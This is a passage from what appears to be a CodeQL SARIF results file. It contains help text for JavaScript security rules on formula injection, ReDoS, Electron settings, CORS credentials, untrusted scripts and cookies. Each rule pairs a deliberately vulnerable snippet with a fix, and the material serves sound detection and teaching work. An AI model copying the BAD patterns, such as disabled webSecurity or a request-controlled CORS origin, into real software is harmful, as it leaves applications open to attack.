as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1236" ], + "description" : "Saving data from an uncontrolled remote source using filesystem or local storage\n leads to disclosure of sensitive information or forgery of entry.", + "id" : "js/ui5-formula-injection", + "kind" : "path-problem", + "name" : "UI5 Formula Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + } ], + "locations" : [ { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/", + "description" : { + "text" : "The QL pack root directory." + } + }, { + "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml", + "description" : { + "text" : "The QL pack definition file." + } + } ] + }, { + "name" : "codeql/javascript-queries", + "semanticVersion" : "0.8.1+8e890571ed7b21bc10698c5dbd032b9ed551d8f1", + "notifications" : [ { + "id" : "js/diagnostics/extraction-errors", + "name" : "js/diagnostics/extraction-errors", + "shortDescription" : { + "text" : "Extraction errors" + }, + "fullDescription" : { + "text" : "List all extraction errors for files in the source code directory." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "description" : "List all extraction errors for files in the source code directory.", + "id" : "js/diagnostics/extraction-errors", + "kind" : "diagnostic", + "name" : "Extraction errors" + } + }, { + "id" : "js/diagnostics/successfully-extracted-files", + "name" : "js/diagnostics/successfully-extracted-files", + "shortDescription" : { + "text" : "Successfully extracted files" + }, + "fullDescription" : { + "text" : "Lists all files in the source code directory that were extracted without encountering an error in the file." + }, + "defaultConfiguration" : { + "enabled" : true + }, + "properties" : { + "tags" : [ "successfully-extracted-files" ], + "description" : "Lists all files in the source code directory that were extracted without encountering an error in the file.", + "id" : "js/diagnostics/successfully-extracted-files", + "kind" : "diagnostic", + "name" : "Successfully extracted files" + } + } ], + "rules" : [ { + "id" : "js/polynomial-redos", + "name" : "js/polynomial-redos", + "shortDescription" : { + "text" : "Polynomial regular expression used on uncontrolled data" + }, + "fullDescription" : { + "text" : "A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that can require polynomial time\n to match may be vulnerable to denial-of-service attacks.", + "id" : "js/polynomial-redos", + "kind" : "path-problem", + "name" : "Polynomial regular expression used on uncontrolled data", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/redos", + "name" : "js/redos", + "shortDescription" : { + "text" : "Inefficient regular expression" + }, + "fullDescription" : { + "text" : "A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], + "description" : "A regular expression that requires exponential time to match certain inputs\n can be a performance bottleneck, and may be vulnerable to denial-of-service\n attacks.", + "id" : "js/redos", + "kind" : "problem", + "name" : "Inefficient regular expression", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/disabling-electron-websecurity", + "name" : "js/disabling-electron-websecurity", + "shortDescription" : { + "text" : "Disabling Electron webSecurity" + }, + "fullDescription" : { + "text" : "Disabling webSecurity can cause critical security vulnerabilities." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n", + "markdown" : "# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n webSecurity: false\n }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-79" ], + "description" : "Disabling webSecurity can cause critical security vulnerabilities.", + "id" : "js/disabling-electron-websecurity", + "kind" : "problem", + "name" : "Disabling Electron webSecurity", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/enabling-electron-insecure-content", + "name" : "js/enabling-electron-insecure-content", + "shortDescription" : { + "text" : "Enabling Electron allowRunningInsecureContent" + }, + "fullDescription" : { + "text" : "Enabling allowRunningInsecureContent can allow remote code execution." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n", + "markdown" : "# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n webPreferences: {\n allowRunningInsecureContent: true\n }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n" + }, + "properties" : { + "tags" : [ "security", "frameworks/electron", "external/cwe/cwe-494" ], + "description" : "Enabling allowRunningInsecureContent can allow remote code execution.", + "id" : "js/enabling-electron-insecure-content", + "kind" : "problem", + "name" : "Enabling Electron allowRunningInsecureContent", + "precision" : "very-high", + "problem.severity" : "error", + "security-severity" : "8.8" + } + }, { + "id" : "js/cors-misconfiguration-for-credentials", + "name" : "js/cors-misconfiguration-for-credentials", + "shortDescription" : { + "text" : "CORS misconfiguration for credentials transfer" + }, + "fullDescription" : { + "text" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n", + "markdown" : "# CORS misconfiguration for credentials transfer\nA server can send the `\"Access-Control-Allow-Credentials\"` CORS header to control when a browser may send user credentials in Cross-Origin HTTP requests.\n\nWhen the `Access-Control-Allow-Credentials` header is `\"true\"`, the `Access-Control-Allow-Origin` header must have a value different from `\"*\"` in order to make browsers accept the header. Therefore, to allow multiple origins for Cross-Origin requests with credentials, the server must dynamically compute the value of the `\"Access-Control-Allow-Origin\"` header. Computing this header value from information in the request to the server can therefore potentially allow an attacker to control the origins that the browser sends credentials to.\n\n\n## Recommendation\nWhen the `Access-Control-Allow-Credentials` header value is `\"true\"`, a dynamic computation of the `Access-Control-Allow-Origin` header must involve sanitization if it relies on user-controlled input.\n\nSince the `\"null\"` origin is easy to obtain for an attacker, it is never safe to use `\"null\"` as the value of the `Access-Control-Allow-Origin` header when the `Access-Control-Allow-Credentials` header value is `\"true\"`.\n\n\n## Example\nIn the example below, the server allows the browser to send user credentials in a Cross-Origin request. The request header `origins` controls the allowed origins for such a Cross-Origin request.\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin;\n // BAD: attacker can choose the value of origin\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n\n // ...\n});\n\n```\nThis is not secure, since an attacker can choose the value of the `origin` request header to make the browser send credentials to their own server. The use of a whitelist containing allowed origins for the Cross-Origin request fixes the issue:\n\n\n```javascript\nvar https = require('https'),\n url = require('url');\n\nvar server = https.createServer(function(){});\n\nserver.on('request', function(req, res) {\n let origin = url.parse(req.url, true).query.origin,\n whitelist = {\n \"https://example.com\": true,\n \"https://subdomain.example.com\": true,\n \"https://example.com:1337\": true\n };\n\n if (origin in whitelist) {\n // GOOD: the origin is in the whitelist\n res.setHeader(\"Access-Control-Allow-Origin\", origin);\n res.setHeader(\"Access-Control-Allow-Credentials\", true);\n }\n\n // ...\n});\n\n```\n\n## References\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Origin](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin).\n* Mozilla Developer Network: [CORS, Access-Control-Allow-Credentials](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials).\n* PortSwigger: [Exploiting CORS Misconfigurations for Bitcoins and Bounties](http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html)\n* W3C: [CORS for developers, Advice for Resource Owners](https://w3c.github.io/webappsec-cors-for-developers/#resources)\n* Common Weakness Enumeration: [CWE-346](https://cwe.mitre.org/data/definitions/346.html).\n* Common Weakness Enumeration: [CWE-639](https://cwe.mitre.org/data/definitions/639.html).\n* Common Weakness Enumeration: [CWE-942](https://cwe.mitre.org/data/definitions/942.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-346", "external/cwe/cwe-639", "external/cwe/cwe-942" ], + "description" : "Misconfiguration of CORS HTTP headers allows for leaks of secret credentials.", + "id" : "js/cors-misconfiguration-for-credentials", + "kind" : "path-problem", + "name" : "CORS misconfiguration for credentials transfer", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "7.5" + } + }, { + "id" : "js/functionality-from-untrusted-source", + "name" : "js/functionality-from-untrusted-source", + "shortDescription" : { + "text" : "Inclusion of functionality from an untrusted source" + }, + "fullDescription" : { + "text" : "Including functionality from an untrusted source may allow an attacker to control the functionality and execute arbitrary code." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n", + "markdown" : "# Inclusion of functionality from an untrusted source\nIncluding a resource from an untrusted source or using an untrusted channel may allow an attacker to include arbitrary code in the response. When including an external resource (for example, a `script` element or an `iframe` element) on a page, it is important to ensure that the received data is not malicious.\n\nWhen including external resources, it is possible to verify that the responding server is the intended one by using an `https` URL. This prevents a MITM (man-in-the-middle) attack where an attacker might have been able to spoof a server response.\n\nEven when `https` is used, an attacker might still compromise the server. When you use a `script` element, you can check for subresource integrity - that is, you can check the contents of the data received by supplying a cryptographic digest of the expected sources to the `script` element. The script will only load sources that match the digest and an attacker will be unable to modify the script even when the server is compromised.\n\nSubresource integrity checking is commonly recommended when importing a fixed version of a library - for example, from a CDN (content-delivery network). Then, the fixed digest of that version of the library can easily be added to the `script` element's `integrity` attribute.\n\n\n## Recommendation\nWhen an `iframe` element is used to embed a page, it is important to use an `https` URL.\n\nWhen using a `script` element to load a script, it is important to use an `https` URL and to consider checking subresource integrity.\n\n\n## Example\nThe following example loads the jQuery library from the jQuery CDN without using `https` and without checking subresource integrity.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\nInstead, loading jQuery from the same domain using `https` and checking subresource integrity is recommended, as in the next example.\n\n\n```html\n\n \n jQuery demo\n \n \n \n ...\n \n\n```\n\n## References\n* MDN: [Subresource Integrity](https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity)\n* Smashing Magazine: [Understanding Subresource Integrity](https://www.smashingmagazine.com/2019/04/understanding-subresource-integrity/)\n* Common Weakness Enumeration: [CWE-830](https://cwe.mitre.org/data/definitions/830.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-830" ], + "description" : "Including functionality from an untrusted source may allow\n an attacker to control the functionality and execute arbitrary code.", + "id" : "js/functionality-from-untrusted-source", + "kind" : "problem", + "name" : "Inclusion of functionality from an untrusted source", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "6.0" + } + }, { + "id" : "js/clear-text-cookie", + "name" : "js/clear-text-cookie", + "shortDescription" : { + "text" : "Clear text transmission of sensitive cookie" + }, + "fullDescription" : { + "text" : "Sending sensitive information in a cookie without requring SSL encryption can expose the cookie to an attacker." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Clear text transmission of sensitive cookie\nCookies that are transmitted in clear text can be intercepted by an attacker. If sensitive cookies are intercepted, the attacker can read the cookie and use it to perform actions on the user's behalf.\n\n\n## Recommendation\nAlways transmit sensitive cookies using SSL by setting the `secure` attribute on the cookie.\n\n\n## Example\nThe following example stores an authentication token in a cookie that can be transmitted in clear text.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}`);\n res.writeHead(200, { 'Content-Type': 'text/html' });\n 